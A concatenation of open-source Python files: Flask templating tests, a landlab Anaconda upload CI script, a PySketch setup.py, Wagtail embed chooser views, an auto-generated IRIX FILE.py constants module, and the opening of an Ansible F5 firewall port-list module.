class TemplatingTestCase(FlaskTestCase):
def test_context_processing(self):
app = flask.Flask(__name__)
@app.context_processor
def context_processor():
return {'injected_value': 42}
@app.route('/')
def index():
return flask.render_template('context_template.html', value=23)
rv = app.test_client().get('/')
self.assert_equal(rv.data, b'<p>23|42')
def test_original_win(self):
app = flask.Flask(__name__)
@app.route('/')
def index():
return flask.render_template_string('{{ config }}', config=42)
rv = app.test_client().get('/')
self.assert_equal(rv.data, b'42')
def test_request_less_rendering(self):
app = flask.Flask(__name__)
app.config['WORLD_NAME'] = 'Special World'
@app.context_processor
def context_processor():
return dict(foo=42)
with app.app_context():
rv = flask.render_template_string('Hello {{ config.WORLD_NAME }} '
'{{ foo }}')
self.assert_equal(rv, 'Hello Special World 42')
def test_standard_context(self):
app = flask.Flask(__name__)
app.secret_key = 'development key'
@app.route('/')
def index():
flask.g.foo = 23
flask.session['test'] = 'aha'
return flask.render_template_string('''
{{ request.args.foo }}
{{ g.foo }}
{{ config.DEBUG }}
{{ session.test }}
''')
rv = app.test_client().get('/?foo=42')
self.assert_equal(rv.data.split(), [b'42', b'23', b'False', b'aha'])
def test_escaping(self):
text = '<p>Hello World!'
app = flask.Flask(__name__)
@app.route('/')
def index():
return flask.render_template('escaping_template.html', text=text,
html=flask.Markup(text))
lines = app.test_client().get('/').data.splitlines()
self.assert_equal(lines, [
b'<p>Hello World!',
b'<p>Hello World!',
b'<p>Hello World!',
b'<p>Hello World!',
b'<p>Hello World!',
b'<p>Hello World!'
])
def test_no_escaping(self):
app = flask.Flask(__name__)
with app.test_request_context():
self.assert_equal(flask.render_template_string('{{ foo }}',
foo='<test>'), '<test>')
self.assert_equal(flask.render_template('mail.txt', foo='<test>'),
'<test> Mail')
def test_macros(self):
app = flask.Flask(__name__)
with app.test_request_context():
macro = flask.get_template_attribute('_macro.html', 'hello')
self.assert_equal(macro('World'), 'Hello World!')
def test_template_filter(self):
app = flask.Flask(__name__)
@app.template_filter()
def my_reverse(s):
return s[::-1]
self.assert_in('my_reverse', app.jinja_env.filters.keys())
self.assert_equal(app.jinja_env.filters['my_reverse'], my_reverse)
self.assert_equal(app.jinja_env.filters['my_reverse']('abcd'), 'dcba')
def test_add_template_filter(self):
app = flask.Flask(__name__)
def my_reverse(s):
return s[::-1]
app.add_template_filter(my_reverse)
self.assert_in('my_reverse', app.jinja_env.filters.keys())
self.assert_equal(app.jinja_env.filters['my_reverse'], my_reverse)
self.assert_equal(app.jinja_env.filters['my_reverse']('abcd'), 'dcba')
def test_template_filter_with_name(self):
app = flask.Flask(__name__)
@app.template_filter('strrev')
def my_reverse(s):
return s[::-1]
self.assert_in('strrev', app.jinja_env.filters.keys())
self.assert_equal(app.jinja_env.filters['strrev'], my_reverse)
self.assert_equal(app.jinja_env.filters['strrev']('abcd'), 'dcba')
def test_add_template_filter_with_name(self):
app = flask.Flask(__name__)
def my_reverse(s):
return s[::-1]
app.add_template_filter(my_reverse, 'strrev')
self.assert_in('strrev', app.jinja_env.filters.keys())
self.assert_equal(app.jinja_env.filters['strrev'], my_reverse)
self.assert_equal(app.jinja_env.filters['strrev']('abcd'), 'dcba')
def test_template_filter_with_template(self):
app = flask.Flask(__name__)
@app.template_filter()
def super_reverse(s):
return s[::-1]
@app.route('/')
def index():
return flask.render_template('template_filter.html', value='abcd')
rv = app.test_client().get('/')
self.assert_equal(rv.data, b'dcba')
def test_add_template_filter_with_template(self):
app = flask.Flask(__name__)
def super_reverse(s):
return s[::-1]
app.add_template_filter(super_reverse)
@app.route('/')
def index():
return flask.render_template('template_filter.html', value='abcd')
rv = app.test_client().get('/')
self.assert_equal(rv.data, b'dcba')
def test_template_filter_with_name_and_template(self):
app = flask.Flask(__name__)
@app.template_filter('super_reverse')
def my_reverse(s):
return s[::-1]
@app.route('/')
def index():
return flask.render_template('template_filter.html', value='abcd')
rv = app.test_client().get('/')
self.assert_equal(rv.data, b'dcba')
def test_add_template_filter_with_name_and_template(self):
app = flask.Flask(__name__)
def my_reverse(s):
return s[::-1]
app.add_template_filter(my_reverse, 'super_reverse')
@app.route('/')
def index():
return flask.render_template('template_filter.html', value='abcd')
rv = app.test_client().get('/')
self.assert_equal(rv.data, b'dcba')
def test_template_test(self):
app = flask.Flask(__name__)
@app.template_test()
def boolean(value):
return isinstance(value, bool)
self.assert_in('boolean', app.jinja_env.tests.keys())
self.assert_equal(app.jinja_env.tests['boolean'], boolean)
self.assert_true(app.jinja_env.tests['boolean'](False))
def test_add_template_test(self):
app = flask.Flask(__name__)
def boolean(value):
return isinstance(value, bool)
app.add_template_test(boolean)
self.assert_in('boolean', app.jinja_env.tests.keys())
self.assert_equal(app.jinja_env.tests['boolean'], boolean)
self.assert_true(app.jinja_env.tests['boolean'](False))
def test_template_test_with_name(self):
app = flask.Flask(__name__)
@app.template_test('boolean')
def is_boolean(value):
return isinstance(value, bool)
self.assert_in('boolean', app.jinja_env.tests.keys())
self.assert_equal(app.jinja_env.tests['boolean'], is_boolean)
self.assert_true(app.jinja_env.tests['boolean'](False))
def test_add_template_test_with_name(self):
app = flask.Flask(__name__)
def is_boolean(value):
return isinstance(value, bool)
app.add_template_test(is_boolean, 'boolean')
self.assert_in('boolean', app.jinja_env.tests.keys())
self.assert_equal(app.jinja_env.tests['boolean'], is_boolean)
self.assert_true(app.jinja_env.tests['boolean'](False))
def test_template_test_with_template(self):
app = flask.Flask(__name__)
@app.template_test()
def boolean(value):
return isinstance(value, bool)
@app.route('/')
def index():
return flask.render_template('template_test.html', value=False)
rv = app.test_client().get('/')
self.assert_in(b'Success!', rv.data)
def test_add_template_test_with_template(self):
app = flask.Flask(__name__)
def boolean(value):
return isinstance(value, bool)
app.add_template_test(boolean)
@app.route('/')
def index():
return flask.render_template('template_test.html', value=False)
rv = app.test_client().get('/')
self.assert_in(b'Success!', rv.data)
def test_template_test_with_name_and_template(self):
app = flask.Flask(__name__)
@app.template_test('boolean')
def is_boolean(value):
return isinstance(value, bool)
@app.route('/')
def index():
return flask.render_template('template_test.html', value=False)
rv = app.test_client().get('/')
self.assert_in(b'Success!', rv.data)
def test_add_template_test_with_name_and_template(self):
app = flask.Flask(__name__)
def is_boolean(value):
return isinstance(value, bool)
app.add_template_test(is_boolean, 'boolean')
@app.route('/')
def index():
return flask.render_template('template_test.html', value=False)
rv = app.test_client().get('/')
self.assert_in(b'Success!', rv.data)
def test_add_template_global(self):
app = flask.Flask(__name__)
@app.template_global()
def get_stuff():
return 42
self.assert_in('get_stuff', app.jinja_env.globals.keys())
self.assert_equal(app.jinja_env.globals['get_stuff'], get_stuff)
self.assert_true(app.jinja_env.globals['get_stuff'](), 42)
with app.app_context():
rv = flask.render_template_string('{{ get_stuff() }}')
self.assert_equal(rv, '42')
def test_custom_template_loader(self):
class MyFlask(flask.Flask):
def create_global_jinja_loader(self):
from jinja2 import DictLoader
return DictLoader({'index.html': 'Hello Custom World!'})
app = MyFlask(__name__)
@app.route('/')
def index():
return flask.render_template('index.html')
c = app.test_client()
rv = c.get('/')
self.assert_equal(rv.data, b'Hello Custom World!')
def test_iterable_loader(self):
app = flask.Flask(__name__)
@app.context_processor
def context_processor():
return {'whiskey': 'Jameson'}
@app.route('/')
def index():
return flask.render_template(
['no_template.xml', # should skip this one
'simple_template.html', # should render this
'context_template.html'],
value=23)
rv = app.test_client().get('/')
self.assert_equal(rv.data, b'<h1>Jameson</h1>')
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TemplatingTestCase))
return suite
| mit |
SiccarPoint/landlab | .ci/appveyor/anaconda_upload.py | 6 | 2049 | from __future__ import print_function
import os
import sys
import subprocess
import traceback
import glob
# print('This is my environment:')
# for name, value in os.environ.items():
# print('{name}: {value}'.format(name=name, value=value))
print('Using python: {prefix}'.format(prefix=sys.prefix))
repo_tag = os.environ.get('APPVEYOR_REPO_TAG', 'false')
tag_name = os.environ.get('APPVEYOR_REPO_TAG_NAME', '')
token = os.environ.get('ANACONDA_TOKEN', 'NOT_A_TOKEN')
if repo_tag == 'true' and tag_name.startswith('v'):
channel = 'main'
os.environ['BUILD_STR'] = ''
else:
channel = 'dev'
os.environ['BUILD_STR'] = 'dev'
# if repo_tag == 'true' and tag_name.startswith('v'):
# channel = 'main'
# else:
# channel = 'dev'
# os.environ['BUILD_STR'] = 'dev'
print('Uploading to {channel} channel'.format(channel=channel))
try:
cmd = ' '.join(['conda', 'build', '--output', '.conda-recipe'])
resp = subprocess.check_output(cmd, shell=True)
except subprocess.CalledProcessError:
traceback.print_exc()
else:
file_to_upload = resp.strip().split()[-1]
# file_to_upload = resp.strip().split(os.linesep.encode('utf-8'))[-1]
(dirname, filename) = os.path.split(file_to_upload)
try:
print(file_to_upload)
print(dirname)
print(filename)
print(dirname + b'\\' + b'landlab*.tar.bz2')
# print(os.linesep.join(os.listdir(dirname)))
print(glob.glob(dirname + b'\\' + b'landlab*.tar.bz2'))
file_to_upload = glob.glob(dirname + b'\\' + b'landlab*.tar.bz2')[0]
except IndexError:
raise RuntimeError('{name}: not a file'.format(name=file_to_upload))
print(file_to_upload)
if not os.path.isfile(file_to_upload):
raise RuntimeError('{name}: not a file'.format(name=file_to_upload))
try:
cmd = ' '.join(['anaconda', '-t', token, 'upload', '--force',
'--user', 'landlab', '--channel', channel,
file_to_upload.decode('utf-8')])
subprocess.check_call(cmd, shell=True)
except subprocess.CalledProcessError:
traceback.print_exc()
| mit |
IGBC/PySketch | setup.py | 1 | 1196 | from setuptools import setup, find_packages
from sketches import __version__
setup(
name='sketches',
version=__version__,
packages=find_packages(exclude=['contrib', 'docs', 'tests']),
entry_points = {
'console_scripts': ['pysketch=sketches:main'],
},
url='https://github.com/IGBC/PySketch',
# license='GPL V3.0',
classifiers=['Development Status :: 2 - Pre-Alpha',
'Environment :: Console',
'Intended Audience :: End Users/Desktop',
'Intended Audience :: Developers',
'Intended Audience :: Education',
'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',
'Natural Language :: English',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3 :: Only',
'Topic :: Software Development :: Interpreters',
'Topic :: Education', ],
author='IGBC',
author_email='segfault@c-base.org',
description='Write Arduino style sketches in Python',
long_description='Write Arduino style sketches in Python\nSee: https://github.com/IGBC/PySketch',
)
| gpl-3.0 |
nutztherookie/wagtail | wagtail/wagtailembeds/views/chooser.py | 4 | 2265 | from __future__ import absolute_import, unicode_literals
from django.forms.utils import ErrorList
from django.utils.translation import ugettext as _
from wagtail.wagtailadmin.modal_workflow import render_modal_workflow
from wagtail.wagtailembeds.exceptions import EmbedNotFoundException
from wagtail.wagtailembeds.finders.embedly import AccessDeniedEmbedlyException, EmbedlyException
from wagtail.wagtailembeds.format import embed_to_editor_html
from wagtail.wagtailembeds.forms import EmbedForm
def chooser(request):
form = EmbedForm(initial=request.GET.dict())
return render_modal_workflow(request, 'wagtailembeds/chooser/chooser.html', 'wagtailembeds/chooser/chooser.js', {
'form': form,
})
def chooser_upload(request):
if request.method == 'POST':
form = EmbedForm(request.POST, request.FILES)
if form.is_valid():
error = None
try:
embed_html = embed_to_editor_html(form.cleaned_data['url'])
return render_modal_workflow(
request, None, 'wagtailembeds/chooser/embed_chosen.js',
{'embed_html': embed_html}
)
except AccessDeniedEmbedlyException:
error = _("There seems to be a problem with your embedly API key. Please check your settings.")
except EmbedNotFoundException:
error = _("Cannot find an embed for this URL.")
except EmbedlyException:
error = _(
"There seems to be an error with Embedly while trying to embed this URL."
" Please try again later."
)
if error:
errors = form._errors.setdefault('url', ErrorList())
errors.append(error)
return render_modal_workflow(
request,
'wagtailembeds/chooser/chooser.html',
'wagtailembeds/chooser/chooser.js',
{
'form': form,
}
)
else:
form = EmbedForm()
return render_modal_workflow(request, 'wagtailembeds/chooser/chooser.html', 'wagtailembeds/chooser/chooser.js', {
'form': form,
})
| bsd-3-clause |
bussiere/pypyjs | website/demo/home/rfk/repos/pypy/lib-python/2.7/plat-irix6/FILE.py | 66 | 11296 | # Generated by h2py from /usr/include/sys/file.h
from warnings import warnpy3k
warnpy3k("the FILE module has been removed in Python 3.0", stacklevel=2)
del warnpy3k
# Included from standards.h
# Included from sys/types.h
# Included from sgidefs.h
_MIPS_ISA_MIPS1 = 1
_MIPS_ISA_MIPS2 = 2
_MIPS_ISA_MIPS3 = 3
_MIPS_ISA_MIPS4 = 4
_MIPS_SIM_ABI32 = 1
_MIPS_SIM_NABI32 = 2
_MIPS_SIM_ABI64 = 3
# Included from sys/pthread.h
P_MYID = (-1)
P_MYHOSTID = (-1)
# Included from sys/bsd_types.h
# Included from sys/mkdev.h
ONBITSMAJOR = 7
ONBITSMINOR = 8
OMAXMAJ = 0x7f
OMAXMIN = 0xff
NBITSMAJOR = 14
NBITSMINOR = 18
MAXMAJ = 0x1ff
MAXMIN = 0x3ffff
OLDDEV = 0
NEWDEV = 1
MKDEV_VER = NEWDEV
def IS_STRING_SPEC_DEV(x): return ((dev_t)(x)==__makedev(MKDEV_VER, 0, 0))
def major(dev): return __major(MKDEV_VER, dev)
def minor(dev): return __minor(MKDEV_VER, dev)
# Included from sys/select.h
FD_SETSIZE = 1024
__NBBY = 8
# Included from string.h
NULL = 0L
NBBY = 8
# Included from sys/cpumask.h
MAXCPU = 128
def CPUMASK_INDEX(bit): return ((bit) >> 6)
def CPUMASK_SHFT(bit): return ((bit) & 0x3f)
def CPUMASK_IS_ZERO(p): return ((p) == 0)
def CPUMASK_IS_NONZERO(p): return ((p) != 0)
# Included from sys/nodemask.h
def CNODEMASK_IS_ZERO(p): return ((p) == 0)
def CNODEMASK_IS_NONZERO(p): return ((p) != 0)
# Included from sys/sema.h
# Included from sys/timespec.h
# Included from sys/param.h
# Included from sys/signal.h
SIGHUP = 1
SIGINT = 2
SIGQUIT = 3
SIGILL = 4
SIGTRAP = 5
SIGIOT = 6
SIGABRT = 6
SIGEMT = 7
SIGFPE = 8
SIGKILL = 9
SIGBUS = 10
SIGSEGV = 11
SIGSYS = 12
SIGPIPE = 13
SIGALRM = 14
SIGTERM = 15
SIGUSR1 = 16
SIGUSR2 = 17
SIGCLD = 18
SIGCHLD = 18
SIGPWR = 19
SIGWINCH = 20
SIGURG = 21
SIGPOLL = 22
SIGIO = 22
SIGSTOP = 23
SIGTSTP = 24
SIGCONT = 25
SIGTTIN = 26
SIGTTOU = 27
SIGVTALRM = 28
SIGPROF = 29
SIGXCPU = 30
SIGXFSZ = 31
SIGK32 = 32
SIGCKPT = 33
SIGRESTART = 34
SIGUME = 35
SIGPTINTR = 47
SIGPTRESCHED = 48
SIGRTMIN = 49
SIGRTMAX = 64
__sigargs = int
# Included from sys/sigevent.h
SIGEV_NONE = 128
SIGEV_SIGNAL = 129
SIGEV_CALLBACK = 130
SIGEV_THREAD = 131
# Included from sys/siginfo.h
SI_MAXSZ = 128
SI_USER = 0
SI_KILL = SI_USER
SI_QUEUE = -1
SI_ASYNCIO = -2
SI_TIMER = -3
SI_MESGQ = -4
ILL_ILLOPC = 1
ILL_ILLOPN = 2
ILL_ILLADR = 3
ILL_ILLTRP = 4
ILL_PRVOPC = 5
ILL_PRVREG = 6
ILL_COPROC = 7
ILL_BADSTK = 8
NSIGILL = 8
FPE_INTDIV = 1
FPE_INTOVF = 2
FPE_FLTDIV = 3
FPE_FLTOVF = 4
FPE_FLTUND = 5
FPE_FLTRES = 6
FPE_FLTINV = 7
FPE_FLTSUB = 8
NSIGFPE = 8
SEGV_MAPERR = 1
SEGV_ACCERR = 2
NSIGSEGV = 2
BUS_ADRALN = 1
BUS_ADRERR = 2
BUS_OBJERR = 3
NSIGBUS = 3
TRAP_BRKPT = 1
TRAP_TRACE = 2
NSIGTRAP = 2
CLD_EXITED = 1
CLD_KILLED = 2
CLD_DUMPED = 3
CLD_TRAPPED = 4
CLD_STOPPED = 5
CLD_CONTINUED = 6
NSIGCLD = 6
POLL_IN = 1
POLL_OUT = 2
POLL_MSG = 3
POLL_ERR = 4
POLL_PRI = 5
POLL_HUP = 6
NSIGPOLL = 6
UME_ECCERR = 1
NSIGUME = 1
SIG_NOP = 0
SIG_BLOCK = 1
SIG_UNBLOCK = 2
SIG_SETMASK = 3
SIG_SETMASK32 = 256
SA_ONSTACK = 0x00000001
SA_RESETHAND = 0x00000002
SA_RESTART = 0x00000004
SA_SIGINFO = 0x00000008
SA_NODEFER = 0x00000010
SA_NOCLDWAIT = 0x00010000
SA_NOCLDSTOP = 0x00020000
_SA_BSDCALL = 0x10000000
MINSIGSTKSZ = 512
SIGSTKSZ = 8192
SS_ONSTACK = 0x00000001
SS_DISABLE = 0x00000002
# Included from sys/ucontext.h
NGREG = 36
NGREG = 37
GETCONTEXT = 0
SETCONTEXT = 1
UC_SIGMASK = 001
UC_STACK = 002
UC_CPU = 004
UC_MAU = 010
UC_MCONTEXT = (UC_CPU|UC_MAU)
UC_ALL = (UC_SIGMASK|UC_STACK|UC_MCONTEXT)
CTX_R0 = 0
CTX_AT = 1
CTX_V0 = 2
CTX_V1 = 3
CTX_A0 = 4
CTX_A1 = 5
CTX_A2 = 6
CTX_A3 = 7
CTX_T0 = 8
CTX_T1 = 9
CTX_T2 = 10
CTX_T3 = 11
CTX_T4 = 12
CTX_T5 = 13
CTX_T6 = 14
CTX_T7 = 15
CTX_A4 = 8
CTX_A5 = 9
CTX_A6 = 10
CTX_A7 = 11
CTX_T0 = 12
CTX_T1 = 13
CTX_T2 = 14
CTX_T3 = 15
CTX_S0 = 16
CTX_S1 = 17
CTX_S2 = 18
CTX_S3 = 19
CTX_S4 = 20
CTX_S5 = 21
CTX_S6 = 22
CTX_S7 = 23
CTX_T8 = 24
CTX_T9 = 25
CTX_K0 = 26
CTX_K1 = 27
CTX_GP = 28
CTX_SP = 29
CTX_S8 = 30
CTX_RA = 31
CTX_MDLO = 32
CTX_MDHI = 33
CTX_CAUSE = 34
CTX_EPC = 35
CTX_SR = 36
CXT_R0 = CTX_R0
CXT_AT = CTX_AT
CXT_V0 = CTX_V0
CXT_V1 = CTX_V1
CXT_A0 = CTX_A0
CXT_A1 = CTX_A1
CXT_A2 = CTX_A2
CXT_A3 = CTX_A3
CXT_T0 = CTX_T0
CXT_T1 = CTX_T1
CXT_T2 = CTX_T2
CXT_T3 = CTX_T3
CXT_T4 = CTX_T4
CXT_T5 = CTX_T5
CXT_T6 = CTX_T6
CXT_T7 = CTX_T7
CXT_S0 = CTX_S0
CXT_S1 = CTX_S1
CXT_S2 = CTX_S2
CXT_S3 = CTX_S3
CXT_S4 = CTX_S4
CXT_S5 = CTX_S5
CXT_S6 = CTX_S6
CXT_S7 = CTX_S7
CXT_T8 = CTX_T8
CXT_T9 = CTX_T9
CXT_K0 = CTX_K0
CXT_K1 = CTX_K1
CXT_GP = CTX_GP
CXT_SP = CTX_SP
CXT_S8 = CTX_S8
CXT_RA = CTX_RA
CXT_MDLO = CTX_MDLO
CXT_MDHI = CTX_MDHI
CXT_CAUSE = CTX_CAUSE
CXT_EPC = CTX_EPC
CXT_SR = CTX_SR
CTX_FV0 = 0
CTX_FV1 = 2
CTX_FA0 = 12
CTX_FA1 = 13
CTX_FA2 = 14
CTX_FA3 = 15
CTX_FA4 = 16
CTX_FA5 = 17
CTX_FA6 = 18
CTX_FA7 = 19
CTX_FT0 = 4
CTX_FT1 = 5
CTX_FT2 = 6
CTX_FT3 = 7
CTX_FT4 = 8
CTX_FT5 = 9
CTX_FT6 = 10
CTX_FT7 = 11
CTX_FT8 = 20
CTX_FT9 = 21
CTX_FT10 = 22
CTX_FT11 = 23
CTX_FT12 = 1
CTX_FT13 = 3
CTX_FS0 = 24
CTX_FS1 = 25
CTX_FS2 = 26
CTX_FS3 = 27
CTX_FS4 = 28
CTX_FS5 = 29
CTX_FS6 = 30
CTX_FS7 = 31
CTX_FT8 = 21
CTX_FT9 = 23
CTX_FT10 = 25
CTX_FT11 = 27
CTX_FT12 = 29
CTX_FT13 = 31
CTX_FT14 = 1
CTX_FT15 = 3
CTX_FS0 = 20
CTX_FS1 = 22
CTX_FS2 = 24
CTX_FS3 = 26
CTX_FS4 = 28
CTX_FS5 = 30
SV_ONSTACK = 0x0001
SV_INTERRUPT = 0x0002
NUMBSDSIGS = (32)
def sigmask(sig): return (1L << ((sig)-1))
def sigmask(sig): return (1L << ((sig)-1))
SIG_ERR = (-1)
SIG_IGN = (1)
SIG_HOLD = (2)
SIG_DFL = (0)
NSIG = 65
MAXSIG = (NSIG-1)
NUMSIGS = (NSIG-1)
BRK_USERBP = 0
BRK_KERNELBP = 1
BRK_ABORT = 2
BRK_BD_TAKEN = 3
BRK_BD_NOTTAKEN = 4
BRK_SSTEPBP = 5
BRK_OVERFLOW = 6
BRK_DIVZERO = 7
BRK_RANGE = 8
BRK_PSEUDO_OP_BIT = 0x80
BRK_PSEUDO_OP_MAX = 0x3
BRK_CACHE_SYNC = 0x80
BRK_MULOVF = 1023
_POSIX_VERSION = 199506L
_POSIX_VERSION = 199506
_POSIX_VDISABLE = 0
MAX_INPUT = 512
MAX_CANON = 256
UID_NOBODY = 60001
GID_NOBODY = UID_NOBODY
UID_NOACCESS = 60002
MAXPID = 0x7ffffff0
MAXUID = 0x7fffffff
MAXLINK = 30000
SSIZE = 1
SINCR = 1
KSTKSIZE = 1
EXTKSTKSIZE = 1
KSTKIDX = 0
KSTEIDX = 1
EXTKSTKSIZE = 0
KSTKIDX = 0
CANBSIZ = 256
HZ = 100
TICK = 10000000
NOFILE = 20
NGROUPS_UMIN = 0
NGROUPS_UMAX = 32
NGROUPS = 16
PMASK = 0177
PCATCH = 0400
PLTWAIT = 01000
PRECALC = 01000
PSWP = 0
PINOD = 10
PSNDD = PINOD
PRIBIO = 20
PZERO = 25
PMEM = 0
NZERO = 20
PPIPE = 26
PVFS = 27
PWAIT = 30
PSLEP = 39
PUSER = 60
PBATCH_CRITICAL = -1
PTIME_SHARE = -2
PTIME_SHARE_OVER = -3
PBATCH = -4
PWEIGHTLESS = -5
IO_NBPC = 4096
IO_BPCSHIFT = 12
MIN_NBPC = 4096
MIN_BPCSHIFT = 12
MIN_CPSSHIFT = 10
BPCSHIFT = 12
CPSSHIFT = 10
BPCSHIFT = 14
CPSSHIFT = 12
CPSSHIFT = 11
BPSSHIFT = (BPCSHIFT+CPSSHIFT)
NULL = 0L
CMASK = 022
NODEV = (-1)
NOPAGE = (-1)
NBPSCTR = 512
SCTRSHFT = 9
def BASEPRI(psw): return (((psw) & SR_IMASK) == SR_IMASK0)
def BASEPRI(psw): return (((psw) & SR_IMASK) == SR_IMASK)
def USERMODE(psw): return (((psw) & SR_KSU_MSK) == SR_KSU_USR)
MAXPATHLEN = 1024
MAXSYMLINKS = 30
MAXNAMELEN = 256
PIPE_BUF = 10240
PIPE_MAX = 10240
NBBY = 8
BBSHIFT = 9
BBSIZE = (1<<BBSHIFT)
BBMASK = (BBSIZE-1)
def BBTOB(bbs): return ((bbs) << BBSHIFT)
def OFFTOBB(bytes): return (((__uint64_t)(bytes) + BBSIZE - 1) >> BBSHIFT)
def OFFTOBBT(bytes): return ((off_t)(bytes) >> BBSHIFT)
def BBTOOFF(bbs): return ((off_t)(bbs) << BBSHIFT)
SEEKLIMIT32 = 0x7fffffff
MAXBSIZE = 8192
DEV_BSIZE = BBSIZE
DEV_BSHIFT = BBSHIFT
def btodb(bytes): return \
def dbtob(db): return \
BLKDEV_IOSHIFT = BPCSHIFT
BLKDEV_IOSIZE = (1<<BLKDEV_IOSHIFT)
def BLKDEV_OFF(off): return ((off) & (BLKDEV_IOSIZE - 1))
def BLKDEV_LBN(off): return ((off) >> BLKDEV_IOSHIFT)
def BLKDEV_LTOP(bn): return ((bn) * BLKDEV_BB)
MAXHOSTNAMELEN = 256
def DELAY(n): return us_delay(n)
def DELAYBUS(n): return us_delaybus(n)
TIMEPOKE_NOW = -100L
MUTEX_DEFAULT = 0x0
METER_NAMSZ = 16
METER_NO_SEQ = -1
def mutex_spinlock(l): return splhi()
def mutex_spintrylock(l): return splhi()
def spinlock_initialized(l): return 1
SV_FIFO = 0x0
SV_LIFO = 0x2
SV_PRIO = 0x4
SV_KEYED = 0x6
SV_DEFAULT = SV_FIFO
SEMA_NOHIST = 0x0001
SEMA_LOCK = 0x0004
NSCHEDCLASS = (-(PWEIGHTLESS)+1)
MR_ACCESS = 1
MR_UPDATE = 2
MRLOCK_BARRIER = 0x1
MRLOCK_BEHAVIOR = 0x2
MRLOCK_DBLTRIPPABLE = 0x4
MRLOCK_ALLOW_EQUAL_PRI = 0x8
MRLOCK_DEFAULT = MRLOCK_BARRIER
def mraccess(mrp): return mraccessf(mrp, 0)
def mrupdate(mrp): return mrupdatef(mrp, 0)
def mp_mutex_unlock(m): return mutex_unlock(m)
def mp_mutex_trylock(m): return mutex_trylock(m)
def mp_mutex_spinlock(m): return mutex_spinlock(m)
# Included from sys/mon.h
MON_LOCKED = 0x01
MON_WAITING = 0x02
MON_TIMEOUT = 0x04
MON_DOSRV = 0x08
MON_RUN = 0x10
MR_READER_BUCKETS = 13
def initlock(l): return spinlock_init(l,0)
def ownlock(x): return 1
def mutex_enter(m): return mutex_lock(m, PZERO)
def mutex_tryenter(m): return mutex_trylock(m)
def mutex_exit(m): return mutex_unlock(m)
def cv_signal(cv): return sv_signal(cv)
def cv_broadcast(cv): return sv_broadcast(cv)
def cv_destroy(cv): return sv_destroy(cv)
RW_READER = MR_ACCESS
RW_WRITER = MR_UPDATE
def rw_exit(r): return mrunlock(r)
def rw_tryupgrade(r): return mrtrypromote(r)
def rw_downgrade(r): return mrdemote(r)
def rw_destroy(r): return mrfree(r)
def RW_WRITE_HELD(r): return ismrlocked(r, MR_UPDATE)
def RW_READ_HELD(r): return ismrlocked(r, MR_ACCESS)
MS_FREE = 0
MS_UPD = 1
MS_ACC = 2
MS_WAITERS = 4
# Included from sys/fcntl.h
FNDELAY = 0x04
FAPPEND = 0x08
FSYNC = 0x10
FDSYNC = 0x20
FRSYNC = 0x40
FNONBLOCK = 0x80
FASYNC = 0x1000
FLARGEFILE = 0x2000
FNONBLK = FNONBLOCK
FDIRECT = 0x8000
FBULK = 0x10000
FDIRENT64 = 0x8000
FCREAT = 0x0100
FTRUNC = 0x0200
FEXCL = 0x0400
FNOCTTY = 0x0800
O_RDONLY = 0
O_WRONLY = 1
O_RDWR = 2
O_NDELAY = 0x04
O_APPEND = 0x08
O_SYNC = 0x10
O_DSYNC = 0x20
O_RSYNC = 0x40
O_NONBLOCK = 0x80
O_LARGEFILE = 0x2000
O_DIRECT = 0x8000
O_BULK = 0x10000
O_CREAT = 0x100
O_TRUNC = 0x200
O_EXCL = 0x400
O_NOCTTY = 0x800
F_DUPFD = 0
F_GETFD = 1
F_SETFD = 2
F_GETFL = 3
F_SETFL = 4
F_SETLK = 6
F_SETLKW = 7
F_CHKFL = 8
F_ALLOCSP = 10
F_FREESP = 11
F_SETBSDLK = 12
F_SETBSDLKW = 13
F_GETLK = 14
F_CHKLK = 15
F_CHKLKW = 16
F_CLNLK = 17
F_RSETLK = 20
F_RGETLK = 21
F_RSETLKW = 22
F_GETOWN = 23
F_SETOWN = 24
F_DIOINFO = 30
F_FSGETXATTR = 31
F_FSSETXATTR = 32
F_GETLK64 = 33
F_SETLK64 = 34
F_SETLKW64 = 35
F_ALLOCSP64 = 36
F_FREESP64 = 37
F_GETBMAP = 38
F_FSSETDM = 39
F_RESVSP = 40
F_UNRESVSP = 41
F_RESVSP64 = 42
F_UNRESVSP64 = 43
F_GETBMAPA = 44
F_FSGETXATTRA = 45
F_SETBIOSIZE = 46
F_GETBIOSIZE = 47
F_GETOPS = 50
F_DMAPI = 51
F_FSYNC = 52
F_FSYNC64 = 53
F_GETBDSATTR = 54
F_SETBDSATTR = 55
F_GETBMAPX = 56
F_SETPRIO = 57
F_GETPRIO = 58
F_RDLCK = 01
F_WRLCK = 02
F_UNLCK = 03
O_ACCMODE = 3
FD_CLOEXEC = 1
FD_NODUP_FORK = 4
BMV_IF_ATTRFORK = 0x1
BMV_IF_NO_DMAPI_READ = 0x2
BMV_IF_PREALLOC = 0x4
BMV_IF_VALID = (BMV_IF_ATTRFORK|BMV_IF_NO_DMAPI_READ|BMV_IF_PREALLOC)
BMV_OF_PREALLOC = 0x1
BMV_IF_EXTENDED = 0x40000000
FMASK = 0x190FF
FOPEN = 0xFFFFFFFF
FREAD = 0x01
FWRITE = 0x02
FNDELAY = 0x04
FAPPEND = 0x08
FSYNC = 0x10
FDSYNC = 0x20
FRSYNC = 0x40
FNONBLOCK = 0x80
FASYNC = 0x1000
FNONBLK = FNONBLOCK
FLARGEFILE = 0x2000
FDIRECT = 0x8000
FBULK = 0x10000
FCREAT = 0x0100
FTRUNC = 0x0200
FEXCL = 0x0400
FNOCTTY = 0x0800
FINVIS = 0x0100
FSOCKET = 0x0200
FINPROGRESS = 0x0400
FPRIORITY = 0x0800
FPRIO = 0x4000
FDIRENT64 = 0x8000
FCLOSEXEC = 0x01
LOCK_SH = 1
LOCK_EX = 2
LOCK_NB = 4
LOCK_UN = 8
L_SET = 0
L_INCR = 1
L_XTND = 2
F_OK = 0
X_OK = 1
W_OK = 2
R_OK = 4
| mit |
awkspace/ansible | lib/ansible/modules/network/f5/bigip_firewall_port_list.py | 14 | 19722 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright: (c) 2017, F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'certified'}
DOCUMENTATION = r'''
---
module: bigip_firewall_port_list
short_description: Manage port lists on BIG-IP AFM
description:
- Manages the AFM port lists on a BIG-IP. This module can be used to add
